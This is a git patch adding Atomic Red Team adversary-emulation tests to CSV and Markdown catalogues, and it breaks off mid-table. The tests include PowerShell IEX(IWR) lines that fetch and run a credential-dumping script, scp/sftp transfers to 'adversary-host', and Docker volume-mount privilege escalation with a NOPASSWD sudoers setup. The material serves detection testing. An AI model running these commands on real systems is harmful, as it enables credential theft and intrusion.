From bbef58d0ae5176b747a4f701a987fa5ca9efb914 Mon Sep 17 00:00:00 2001 From: GeoPD Date: Mon, 25 Nov 2024 05:43:07 +0000 Subject: [PATCH] 2024-11-25 - 11:13 IST - Atomic Red Attack Extraction --- atomic-red-attacks.csv | 258 ++++++++++++++++++++++++++++++++++++----- atomic-red-attacks.md | 146 +++++++++++++++++++---- 2 files changed, 350 insertions(+), 54 deletions(-) diff --git a/atomic-red-attacks.csv b/atomic-red-attacks.csv index ac8e2a4..4fc0895 100644 --- a/atomic-red-attacks.csv +++ b/atomic-red-attacks.csv @@ -184,11 +184,25 @@ input_arguments.cert_export.default: /tmp/certs.pem " T1222,File and Directory Permissions Modification,Enable Local and Remote Symbolic Links via fsutil,6c4ac96f-d4fa-44f4-83ca-56d8f4a55c02,"Use fsutil to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) -",windows,,,"fsutil behavior set SymlinkEvaluation R2L:1 +",windows,,,"fsutil behavior set SymlinkEvaluation R2L:1 fsutil behavior set SymlinkEvaluation R2R:1 ",command_prompt,True,,"fsutil behavior set SymlinkEvaluation R2L:0 fsutil behavior set SymlinkEvaluation R2R:0 ",,, +T1222,File and Directory Permissions Modification,Enable Local and Remote Symbolic Links via reg.exe,78bef0d4-57fb-417d-a67a-b75ae02ea3ab,"Use reg.exe to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. +[reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) +",windows,,,"reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d ""1"" /f +reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d ""1"" /f +",command_prompt,True,,"reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d ""0"" /f +reg add ""HKLM\SYSTEM\CurrentControlSet\Control\FileSystem"" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d ""0"" /f +",,, +T1222,File and Directory Permissions Modification,Enable Local and Remote Symbolic Links via Powershell,6cd715aa-20ac-4be1-a8f1-dda7bae160bd,"Use Powershell to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. +[reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) +",windows,,,"New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore +New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore +",powershell,True,,"New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore +New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore +",,, T1207,Rogue Domain Controller,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,"Use Mimikatz DCShadow method to simulate behavior of an Active Directory Domain Controller and edit protected attribute. [DCShadow](https://www.dcshadow.com/) @@ -1164,6 +1178,168 @@ input_arguments.username.type: string input_arguments.username.default: adversary +" +T1105,Ingress Tool Transfer,Windows pull file using scp.exe,401667dc-05a6-4da0-a2a7-acfe4819559c,"This test simulates pulling files using SCP on a Windows environment. +",windows,,,"scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path} +",powershell,True,,,powershell,"dependencies.0.description: This test requires the `scp` command to be available on the system. + +dependencies.0.prereq_command: if (Get-Command scp -ErrorAction SilentlyContinue) { + Write-Output ""SCP command is available."" + exit 0 +} else { + Write-Output ""SCP command is not available."" + exit 1 +} + +dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client +$capabilityName = ""OpenSSH.Client~~~~0.0.1.0"" +try { + # Install the OpenSSH Client capability + Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop + Write-Host ""OpenSSH Client has been successfully installed."" -ForegroundColor Green +} catch { + # Handle any errors that occur during the installation process + Write-Host ""An error occurred while installing OpenSSH Client: $_"" -ForegroundColor Red +} + +","input_arguments.remote_path.description: Path of folder to pull + +input_arguments.remote_path.type: path + +input_arguments.remote_path.default: /tmp/T1105.txt + +input_arguments.remote_host.description: Remote host to pull from + +input_arguments.remote_host.type: string + +input_arguments.remote_host.default: adversary-host + +input_arguments.local_path.description: Local path to receive files + +input_arguments.local_path.type: path + +input_arguments.local_path.default: C:\temp + +input_arguments.username.description: User account to authenticate on remote host + +input_arguments.username.type: string + +input_arguments.username.default: adversary + +" +T1105,Ingress Tool Transfer,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,"This test simulates pushing files using SFTP on a Windows environment. +",windows,,,"# Check if the folder exists, create it if it doesn't +$folderPath = ""#{local_path}"" +if (-Not (Test-Path -Path $folderPath)) { + New-Item -Path $folderPath -ItemType Directory +} +# Create the file +$filePath = Join-Path -Path $folderPath -ChildPath ""#{file_name}"" +New-Item -Path $filePath -ItemType File -Force +Write-Output ""File created: $filePath"" +# Attack command +echo ""put #{local_path}\#{file_name}"" | sftp #{username}@#{remote_host}:#{remote_path} +",powershell,True,,"$filePath = Join-Path -Path ""#{local_path}"" -ChildPath ""#{file_name}"" +Remove-Item -Path $filePath -Force +Write-Output ""File deleted: $filePath"" +",powershell,"dependencies.0.description: This test requires the `sftp` command to be available on the system. + +dependencies.0.prereq_command: if (Get-Command sftp -ErrorAction SilentlyContinue) { + Write-Output ""SFTP command is available."" + exit 0 +} else { + Write-Output ""SFTP command is not available."" + exit 1 +} + +dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client +$capabilityName = ""OpenSSH.Client~~~~0.0.1.0"" +try { + # Install the OpenSSH Client capability + Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop + Write-Host ""OpenSSH Client has been successfully installed."" -ForegroundColor Green +} catch { + # Handle any errors that occur during the installation process + Write-Host ""An error occurred while installing OpenSSH Client: $_"" -ForegroundColor Red +} + +","input_arguments.remote_path.description: Path of folder to copy + +input_arguments.remote_path.type: path + +input_arguments.remote_path.default: /tmp + +input_arguments.remote_host.description: Remote host to send + +input_arguments.remote_host.type: string + +input_arguments.remote_host.default: adversary-host + +input_arguments.local_path.description: Local path to receive sftp + +input_arguments.local_path.type: path + +input_arguments.local_path.default: C:\temp + +input_arguments.file_name.description: Name of the file to transfer + +input_arguments.file_name.type: string + +input_arguments.file_name.default: T1105.txt + +input_arguments.username.description: User account to authenticate on remote host + +input_arguments.username.type: string + +input_arguments.username.default: adversary + +" +T1105,Ingress Tool Transfer,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,"This test simulates pulling files using SFTP on a Windows environment. +",windows,,,sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path},powershell,True,,,powershell,"dependencies.0.description: This test requires the `sftp` command to be available on the system. + +dependencies.0.prereq_command: if (Get-Command sftp -ErrorAction SilentlyContinue) { + Write-Output ""SFTP command is available."" + exit 0 +} else { + Write-Output ""SFTP command is not available."" + exit 1 +} + +dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client +$capabilityName = ""OpenSSH.Client~~~~0.0.1.0"" +try { + # Install the OpenSSH Client capability + Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop + Write-Host ""OpenSSH Client has been successfully installed."" -ForegroundColor Green +} catch { + # Handle any errors that occur during the installation process + Write-Host ""An error occurred while installing OpenSSH Client: $_"" -ForegroundColor Red +} + +","input_arguments.remote_path.description: Path of file to pull + +input_arguments.remote_path.type: path + +input_arguments.remote_path.default: /tmp/T1105.txt + +input_arguments.remote_host.description: Remote host to pull from + +input_arguments.remote_host.type: string + +input_arguments.remote_host.default: adversary-host + +input_arguments.local_path.description: Local path to receive files + +input_arguments.local_path.type: path + +input_arguments.local_path.default: C:\temp + +input_arguments.username.description: User account to authenticate on remote host + +input_arguments.username.type: string + +input_arguments.username.default: adversary + " T1006,Direct Volume Access,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,"This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. @@ -7373,9 +7549,9 @@ dependencies.0.prereq_command: try { dependencies.0.get_prereq_command: Write-Host ""You will need to install Microsoft Word manually to meet this requirement"" ", -T1555,Credentials from Password Stores,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,This module will extract the credentials from Windows Credential Manager,windows,,,"IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force +T1555,Credentials from Password Stores,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,This module will extract the credentials from Windows Credential Manager,windows,,,"IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force ",powershell,False,,,,, -T1555,Credentials from Password Stores,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,This module will extract the credentials from Windows Credential Manager,windows,,,"IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force +T1555,Credentials from Password Stores,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,This module will extract the credentials from Windows Credential Manager,windows,,,"IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force ",powershell,False,,,,, T1555,Credentials from Password Stores,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe,windows,,,"vaultcmd /listcreds:""Windows Credentials"" /all ",powershell,False,,,,, @@ -13279,6 +13455,34 @@ input_arguments.listen_port.type: integer input_arguments.listen_port.default: 4444 +" +T1611,Escape to Host,Privilege Escalation via Docker Volume Mapping,39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4,"This test demonstrates privilege escalation by abusing Docker's volume mapping +feature to gain access to the host file system. By mounting the root directory +of the host into a Docker container, the attacker can use chroot to operate as +root on the host system. +",containers,,,"echo ""Current user: #{username}"" +sudo -u docker_user sh -c ""sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"" +",sh,True,,"USERNAME=""#{username}""; SUDOERS_FILE=""/etc/sudoers.d/$USERNAME""; id ""$USERNAME"" &>/dev/null && userdel -r ""$USERNAME"" && echo -e ""$USERNAME is deleted.""; [[ -f ""$SUDOERS_FILE"" ]] && rm -f ""$SUDOERS_FILE""; echo ""Cleanup complete."" +",,"dependencies.0.description: Docker +dependencies.0.prereq_command: command -v docker &> /dev/null && echo ""Docker is installed"" || { echo ""Docker is not installed.""; exit 1; } + +dependencies.0.get_prereq_command: echo ""You should install docker manually."" + +dependencies.1.description: Docker Privileged User +dependencies.1.prereq_command: sudo -l -U #{username} | grep ""(ALL) NOPASSWD: /usr/bin/docker"" + +dependencies.1.get_prereq_command: USERNAME=""#{username}"" +PASSWORD=""password123"" +SUDO_COMMAND=""/usr/bin/docker"" +SUDOERS_FILE=""/etc/sudoers.d/$USERNAME"" +[[ $EUID -ne 0 ]] && echo ""Run as root."" && exit 1; id ""$USERNAME"" &>/dev/null || { useradd -m -s /bin/bash ""$USERNAME"" && echo ""$USERNAME:$PASSWORD"" | chpasswd; }; [[ -f ""$SUDOERS_FILE"" ]] || { echo ""$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND"" > ""$SUDOERS_FILE"" && chmod 440 ""$SUDOERS_FILE""; }; echo ""Setup complete. User: $USERNAME, Password: $PASSWORD"" + +","input_arguments.username.default: docker_user + +input_arguments.username.description: Username that run attack command + +input_arguments.username.type: string + " T1001.002,Data Obfuscation via Steganography,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,"This atomic test, named ""Steganographic Tarball Embedding"", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) within an image. @@ -21093,68 +21297,64 @@ input_arguments.output-key-file.default: gcp-art-service-account-1.json " T1078.004,Valid Accounts: Cloud Accounts,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,"Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. -",iaas:azure,,,"$secure_pwd = ""#{password}"" | ConvertTo-SecureString -AsPlainText -Force -$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ""#{username}"", $secure_pwd -Connect-AzAccount -Credential $creds -New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name} +",iaas:azure,,,"New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name} ",powershell,False,,"Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force +Remove-AzAutomationAccount -ResourceGroupName #{resource_group} -Name #{automation_account_name} -Force +Remove-AzResourceGroup -Name #{resource_group} -Force +echo ""Cleanup should be completed. Run 'terraform destroy` to ensure remaining resources are also deleted."" cd ""$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"" terraform destroy -auto-approve ",powershell,"dependencies.0.description: Check if terraform is installed. dependencies.0.prereq_command: terraform version -dependencies.0.get_prereq_command: echo Please install terraform. +dependencies.0.get_prereq_command: echo ""Please install terraform via https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli (URL accurate as of Nov. 15, 2024)."" + +dependencies.1.description: Check if Azure CLI and Azure Powershell are installed. -dependencies.1.description: Install-Module -Name Az +* Login to Azure CLI with ""az login"", and login to Azure Powershell with ""Connect-AzAccount"". Sessions are not shared. +* Azure Powershell used in this test as they have better automation performance and error logging than Azure CLI. dependencies.1.prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -dependencies.1.get_prereq_command: Install-Module -Name Az -Scope CurrentUser -Force +dependencies.1.get_prereq_command: $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindowsx64 -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi dependencies.2.description: Check if the user is logged into Azure. -dependencies.2.prereq_command: az account show +dependencies.2.prereq_command: try {if (-not (Get-AzContext)) { exit 1 } else { exit 0 }} catch {exit 1} -dependencies.2.get_prereq_command: echo Configure your Azure account using: az login. +dependencies.2.get_prereq_command: echo ""* Configure your Azure account using: Connect-AzAccount"" dependencies.3.description: Create dependency resources using terraform +* If fail to meet prereq, navigate to T1078.004-2 using ""cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/"" +* Open the ""terraform.tfvars"" file and fill in the variables with your desired values. +* Re-run -GetPrereqs + dependencies.3.prereq_command: try {if (Test-Path ""$PathToAtomicsFolder/T1078.004/src/T1078.004-2/terraform.tfstate"" ){ exit 0 } else {exit 1}} catch {exit 1} -dependencies.3.get_prereq_command: cd ""$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"" +dependencies.3.get_prereq_command: echo ""Navigating to: $PathToAtomicsFolder/T1078.004/src/T1078.004-2/"" +cd ""$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"" terraform init terraform apply -auto-approve -","input_arguments.username.description: Azure username - -input_arguments.username.type: string - -input_arguments.username.default: None - -input_arguments.password.description: Azure password - -input_arguments.password.type: string - -input_arguments.password.default: None - -input_arguments.resource_group.description: Name of the resource group +","input_arguments.resource_group.description: Name of the resource group input_arguments.resource_group.type: string -input_arguments.resource_group.default: None +input_arguments.resource_group.default: ART-ResourceGroupName-T1078-004 input_arguments.runbook_name.description: Name of the runbook name input_arguments.runbook_name.type: string -input_arguments.runbook_name.default: None +input_arguments.runbook_name.default: ART-RunbookName-T1078-004 input_arguments.automation_account_name.description: Name of the automation account name input_arguments.automation_account_name.type: string -input_arguments.automation_account_name.default: None +input_arguments.automation_account_name.default: ART-AutomationAccountName-T1078-004 " T1078.004,Valid Accounts: Cloud Accounts,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,"This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*. The idea for this Atomic came from a Rule published by the Elastic team. diff --git a/atomic-red-attacks.md b/atomic-red-attacks.md index 442f617..9477684 100644 --- a/atomic-red-attacks.md +++ b/atomic-red-attacks.md @@ -83,6 +83,10 @@ | | | | | | | | | | | | | | | | input_arguments.cert_export.default: /tmp/certs.pem | | T1222 | File and Directory Permissions Modification | Enable Local and Remote Symbolic Links via fsutil | 6c4ac96f-d4fa-44f4-83ca-56d8f4a55c02 | Use fsutil to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. | windows | nan | nan | fsutil behavior set SymlinkEvaluation R2L:1 | command_prompt | 1 | nan | fsutil behavior set SymlinkEvaluation R2L:0 | nan | nan | nan | | | | | | [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) | | | | fsutil behavior set SymlinkEvaluation R2R:1 | | | | fsutil behavior set SymlinkEvaluation R2R:0 | | | | +| T1222 | File and Directory Permissions Modification | Enable Local and Remote Symbolic Links via reg.exe | 78bef0d4-57fb-417d-a67a-b75ae02ea3ab | Use reg.exe to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. | windows | nan | nan | reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d "1" /f | command_prompt | 1 | nan | reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToLocalEvaluation /t REG_DWORD /d "0" /f | nan | nan | nan | +| | | | | [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) | | | | reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d "1" /f | | | | reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v SymlinkRemoteToRemoteEvaluation /t REG_DWORD /d "0" /f | | | | +| T1222 | File and Directory Permissions Modification | Enable Local and Remote Symbolic Links via Powershell | 6cd715aa-20ac-4be1-a8f1-dda7bae160bd | Use Powershell to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths. | windows | nan | nan | New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore | powershell | 1 | nan | New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToLocalEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore | nan | nan | nan | +| | | | | [reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/) | | | | New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 1 -Force -ErrorAction Ignore | | | | New-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\Filesystems\NTFS -Name SymlinkRemoteToRemoteEvaluation -PropertyType DWORD -Value 0 -Force -ErrorAction Ignore | | | | | T1207 | Rogue Domain Controller | DCShadow (Active Directory) | 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 | Use Mimikatz DCShadow method to simulate behavior of an Active Directory Domain Controller and edit protected attribute. | windows | nan | nan | # starting fake DC server, as SYSTEM (required) | powershell | 1 | nan | Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore | powershell | dependencies.0.description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) | input_arguments.object.description: Targeted object (for machine account do not forget to add final '$') | | | | | | | | | | $dc_output_file = "PathToAtomicsFolder\..\ExternalPayloads\art-T1207-mimikatz-DC.log" | | | | | | | | | | | | | [DCShadow](https://www.dcshadow.com/) | | | | Remove-Item $dc_output_file -ErrorAction Ignore | | | | | | dependencies.0.prereq_command: $mimikatz_path = cmd /c echo #{mimikatz_path} | input_arguments.object.type: string | @@ -640,6 +644,81 @@ | | | | | | | | | | | | | | | | input_arguments.username.type: string | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | input_arguments.username.default: adversary | +| T1105 | Ingress Tool Transfer | Windows pull file using scp.exe | 401667dc-05a6-4da0-a2a7-acfe4819559c | This test simulates pulling files using SCP on a Windows environment. | windows | nan | nan | scp.exe #{username}@#{remote_host}:#{remote_path} #{local_path} | powershell | 1 | nan | nan | powershell | dependencies.0.description: This test requires the `scp` command to be available on the system. | input_arguments.remote_path.description: Path of folder to pull | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | dependencies.0.prereq_command: if (Get-Command scp -ErrorAction SilentlyContinue) { | input_arguments.remote_path.type: path | +| | | | | | | | | | | | | | | Write-Output "SCP command is available." | | +| | | | | | | | | | | | | | | exit 0 | input_arguments.remote_path.default: /tmp/T1105.txt | +| | | | | | | | | | | | | | | } else { | | +| | | | | | | | | | | | | | | Write-Output "SCP command is not available." | input_arguments.remote_host.description: Remote host to pull from | +| | | | | | | | | | | | | | | exit 1 | | +| | | | | | | | | | | | | | | } | input_arguments.remote_host.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client | input_arguments.remote_host.default: adversary-host | +| | | | | | | | | | | | | | | $capabilityName = "OpenSSH.Client~~~~0.0.1.0" | | +| | | | | | | | | | | | | | | try { | input_arguments.local_path.description: Local path to receive files | +| | | | | | | | | | | | | | | # Install the OpenSSH Client capability | | +| | | | | | | | | | | | | | | Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop | input_arguments.local_path.type: path | +| | | | | | | | | | | | | | | Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green | | +| | | | | | | | | | | | | | | } catch { | input_arguments.local_path.default: C:\temp | +| | | | | | | | | | | | | | | # Handle any errors that occur during the installation process | | +| | | | | | | | | | | | | | | Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red | input_arguments.username.description: User account to authenticate on remote host | +| | | | | | | | | | | | | | | } | | +| | | | | | | | | | | | | | | | input_arguments.username.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.username.default: adversary | +| T1105 | Ingress Tool Transfer | Windows push file using sftp.exe | 205e676e-0401-4bae-83a5-94b8c5daeb22 | This test simulates pushing files using SFTP on a Windows environment. | windows | nan | nan | # Check if the folder exists, create it if it doesn't | powershell | 1 | nan | $filePath = Join-Path -Path "#{local_path}" -ChildPath "#{file_name}" | powershell | dependencies.0.description: This test requires the `sftp` command to be available on the system. | input_arguments.remote_path.description: Path of folder to copy | +| | | | | | | | | $folderPath = "#{local_path}" | | | | Remove-Item -Path $filePath -Force | | | | +| | | | | | | | | if (-Not (Test-Path -Path $folderPath)) { | | | | Write-Output "File deleted: $filePath" | | dependencies.0.prereq_command: if (Get-Command sftp -ErrorAction SilentlyContinue) { | input_arguments.remote_path.type: path | +| | | | | | | | | New-Item -Path $folderPath -ItemType Directory | | | | | | Write-Output "SFTP command is available." | | +| | | | | | | | | } | | | | | | exit 0 | input_arguments.remote_path.default: /tmp | +| | | | | | | | | # Create the file | | | | | | } else { | | +| | | | | | | | | $filePath = Join-Path -Path $folderPath -ChildPath "#{file_name}" | | | | | | Write-Output "SFTP command is not available." | input_arguments.remote_host.description: Remote host to send | +| | | | | | | | | New-Item -Path $filePath -ItemType File -Force | | | | | | exit 1 | | +| | | | | | | | | Write-Output "File created: $filePath" | | | | | | } | input_arguments.remote_host.type: string | +| | | | | | | | | # Attack command | | | | | | | | +| | | | | | | | | echo "put #{local_path}\#{file_name}" | sftp #{username}@#{remote_host}:#{remote_path} | | | | | | dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client | input_arguments.remote_host.default: adversary-host | +| | | | | | | | | | | | | | | $capabilityName = "OpenSSH.Client~~~~0.0.1.0" | | +| | | | | | | | | | | | | | | try { | input_arguments.local_path.description: Local path to receive sftp | +| | | | | | | | | | | | | | | # Install the OpenSSH Client capability | | +| | | | | | | | | | | | | | | Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop | input_arguments.local_path.type: path | +| | | | | | | | | | | | | | | Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green | | +| | | | | | | | | | | | | | | } catch { | input_arguments.local_path.default: C:\temp | +| | | | | | | | | | | | | | | # Handle any errors that occur during the installation process | | +| | | | | | | | | | | | | | | Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red | input_arguments.file_name.description: Name of the file to transfer | +| | | | | | | | | | | | | | | } | | +| | | | | | | | | | | | | | | | input_arguments.file_name.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.file_name.default: T1105.txt | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.username.description: User account to authenticate on remote host | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.username.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.username.default: adversary | +| T1105 | Ingress Tool Transfer | Windows pull file using sftp.exe | 3d25f1f2-55cb-4a41-a523-d17ad4cfba19 | This test simulates pulling files using SFTP on a Windows environment. | windows | nan | nan | sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path} | powershell | 1 | nan | nan | powershell | dependencies.0.description: This test requires the `sftp` command to be available on the system. | input_arguments.remote_path.description: Path of file to pull | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | dependencies.0.prereq_command: if (Get-Command sftp -ErrorAction SilentlyContinue) { | input_arguments.remote_path.type: path | +| | | | | | | | | | | | | | | Write-Output "SFTP command is available." | | +| | | | | | | | | | | | | | | exit 0 | input_arguments.remote_path.default: /tmp/T1105.txt | +| | | | | | | | | | | | | | | } else { | | +| | | | | | | | | | | | | | | Write-Output "SFTP command is not available." | input_arguments.remote_host.description: Remote host to pull from | +| | | | | | | | | | | | | | | exit 1 | | +| | | | | | | | | | | | | | | } | input_arguments.remote_host.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client | input_arguments.remote_host.default: adversary-host | +| | | | | | | | | | | | | | | $capabilityName = "OpenSSH.Client~~~~0.0.1.0" | | +| | | | | | | | | | | | | | | try { | input_arguments.local_path.description: Local path to receive files | +| | | | | | | | | | | | | | | # Install the OpenSSH Client capability | | +| | | | | | | | | | | | | | | Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop | input_arguments.local_path.type: path | +| | | | | | | | | | | | | | | Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green | | +| | | | | | | | | | | | | | | } catch { | input_arguments.local_path.default: C:\temp | +| | | | | | | | | | | | | | | # Handle any errors that occur during the installation process | | +| | | | | | | | | | | | | | | Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red | input_arguments.username.description: User account to authenticate on remote host | +| | | | | | | | | | | | | | | } | | +| | | | | | | | | | | | | | | | input_arguments.username.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.username.default: adversary | | T1006 | Direct Volume Access | Read volume boot sector via DOS device path (PowerShell) | 88f6327e-51ec-4bbf-b2e8-3fea534eab8b | This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. | windows | nan | nan | $buffer = New-Object byte[] 11 | powershell | 1 | nan | nan | nan | nan | input_arguments.volume.description: Drive letter of the volume to access | | | | | | On success, a hex dump of the first 11 bytes of the volume is displayed. | | | | $handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite' | | | | | | | | | | | | | | | | | $handle.Read($buffer, 0, 